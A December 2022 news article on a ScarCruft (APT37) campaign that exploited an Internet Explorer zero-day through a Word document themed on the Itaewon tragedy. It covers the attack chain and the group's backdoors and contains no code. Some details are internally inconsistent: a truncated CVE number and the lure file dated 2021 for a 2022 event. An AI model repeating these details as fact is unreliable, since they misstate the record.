Posted on December 9, 2022 at 2:51 PM

Google issues alert on Internet Explorer zero-day vulnerability exploited by ScarCruft hackers

Hackers based in North Korea have exploited a zero-day vulnerability in Internet Explorer. These hackers have exploited this vulnerability by targeting users based in South Korea by taking advantage of the recent Itaweon Halloween crowd stampede. The malicious actors are tricking users into downloading malware into their devices.

Google warns of zero-day vulnerability on Internet Explorer

Researchers with the Google Threat Analysis Group discovered the malware in question. The researchers involved include Benoít Sevens and Clément Lecigne. The latest discovery joins the list of attacks that the ScarCruft threat actor group has conducted.

ScarCruft threat actor group is also known as APT37. Its other identifying names include Reaper, InkySquid, and Ricochet Chollima. The Google researchers noted that the threat actor group has a history of targeting particular individuals, including but not limited to South Korean users.

In the Thursday analysis, the researchers noted that “the group has historically focused their targeting on South Korean users, North Korean defectors, policymakers, journalists, and human rights activists.”

The findings made by the researchers also reveal that the threat actor group continued to exploit the vulnerabilities in Internet Explorer. Some of the vulnerabilities that they exploited were CVE-2020-138- and CVE-2021-26411. These vulnerabilities were used to launch backdoor attacks such as BLUELIGHT and Dolphin.

The Dolphin backdoor was only detected recently after being disclosed by the ESET cybersecurity company towards the end of last month. The APT37 seems to be already exploiting this backdoor to conduct its campaigns.

The other critical tool that was also used in the exploit is RokRat. The latter is a remote access trojan that runs on Windows devices. The trojan has multiple functions allowing it to conduct a wide range of functions such as capturing screenshots, logging keystrokes, and harvesting the Bluetooth device information.

The Google research team also took note of the attack chain used by the threat actors. The findings revealed that the actors used a malicious Microsoft Word document uploaded on VirusTotal on October 31, 2021.

The hackers also exploit another zero-day bug on Internet Explorer. This bug exists in the Jscript9 JavaScript engine. Microsoft patched the vulnerability that is named CVE-2022-41128 in November 2022.

Targeting South Korean users

The malware file addressed the incident in the Itaewon neighborhood on October 29. The threat actors are taking advantage of the high public interest in the tragedy.

Cybersecurity researchers have also noted that it was not surprising that the hacking group targeted users based in South Korea. However, they note that the group has not used zero-day exploits for quite some time, making the recent case unique.

Filip Jurcacko, a researcher with the ESET cybersecurity company, noted, “It is not surprising that they continue to target South Korean users. We haven’t seen ScarCruft use zero-day exploits for some time. Previously, they were repurposing public PoCs of n-day exploits.”

Once users open the file, the threat actors can exploit the vulnerability in question. The attack is also facilitated by the fact that Microsoft Office supports HTML content through Internet Explorer. This makes it easy for the threat actors to access the user’s device and complete the exploit.

The MalwareHunter team has also said that this was not the first time a threat actor group exploited the Word file in question. According to MalwareHunter, the malicious file was also shared by the Shadow Chaser Group on October 31 this year.

The team notes that the malicious word file was an “interesting DOCX injection template sample” and that its origins were in Korea. This means that in almost all instances, the malware was used to conduct the same type of attack by targeting users based in South Korea.

After the hackers successfully exploited the vulnerability, they delivered a shellcode that wiped all traces. They later cleared the cache and history on Internet Explorer. Moreover, they downloaded the next stage payload.

The Google researchers noted that they could not recover the other malware used in the campaign. However, they added that the malware could have been involved in deploying the RokRat, BLUELIGHT, and Dolphin backdoors.

“Given the rarity/scarcity of zero-day exploits, we expect ScarCruft would use it in combination with some of their more sophisticated backdoors, such as Dolphin. Moreover, the office theme if [command-and-control] domains matches previous campaigns,” the Google TAG team noted.